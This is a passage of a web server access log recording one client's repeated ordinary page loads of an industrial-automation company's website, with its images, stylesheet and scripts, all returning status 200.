[Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:00:58:34 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:00:58:34 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:00:58:34 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:00:58:34 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20912] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:00:58:34 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:00:58:34 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 301490] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:00:58:34 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:00:58:34 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:00:59:38 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10447] [Gzip 5.47] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:00:59:38 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:00:59:38 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:00:59:38 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:00:59:38 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:00:59:38 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:00:59:38 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:00:59:38 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20912] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:00:59:38 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:00:59:38 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 304893] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:00:59:38 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:00:59:39 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:01:02:01 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10447] [Gzip 5.47] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:01:02:01 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:01:02:01 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:01:02:01 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:01:02:01 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:01:02:01 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:01:02:01 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:01:02:01 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20912] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:01:02:01 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:01:02:01 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 317866] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:01:02:01 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:01:02:02 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:01:10:35 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10424] [Gzip 5.47] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:01:10:35 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:01:10:35 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:01:10:35 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:01:10:35 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:01:10:35 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:01:10:35 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:01:10:35 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20912] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:01:10:35 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:01:10:36 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:01:10:36 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 317866] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:01:10:36 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:01:10:36 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:01:11:07 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10382] [Gzip 5.49] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:01:11:07 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:01:11:07 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:01:11:07 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:01:11:07 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:01:11:07 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:01:11:07 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:01:11:07 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20912] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:01:11:07 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:01:11:07 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:01:11:07 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:01:11:08 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 317866] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:01:11:08 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:01:11:08 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:01:19:19 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10383] [Gzip 5.49] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:01:19:19 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:01:19:19 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:01:19:19 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:01:19:19 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:01:19:19 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:01:19:19 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:01:19:19 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20912] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:01:19:19 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:01:19:19 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:01:19:19 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:01:19:19 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 317866] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:01:19:19 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:01:19:20 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:01:26:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10383] [Gzip 5.49] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:01:26:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:01:26:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:01:26:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" 